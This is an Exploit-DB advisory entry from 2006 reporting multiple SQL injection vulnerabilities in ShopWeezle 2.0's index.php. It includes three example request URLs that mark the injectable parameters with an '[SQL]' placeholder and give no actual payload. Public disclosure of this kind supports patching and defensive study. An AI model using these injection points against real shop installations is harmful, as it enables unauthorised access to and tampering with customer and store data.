ShopWeezle 2.0 - 'index.php' Multiple SQL Injections

EDB-ID:

27613


Author:

r0t

Type:

webapps


Platform:

PHP

Date:

2006-04-10


source: https://www.securityfocus.com/bid/17441/info
 
ShopWeezle is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. 
 
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

http://www.example.com/index.php?x=0&itemgr=1[SQL]
http://www.example.com/index.php?caller=xlink&url=brand.php&brandID=1[SQL]
http://www.example.com/index.php?x=0&caller=xlink&url=gallery.php&album=1[SQL]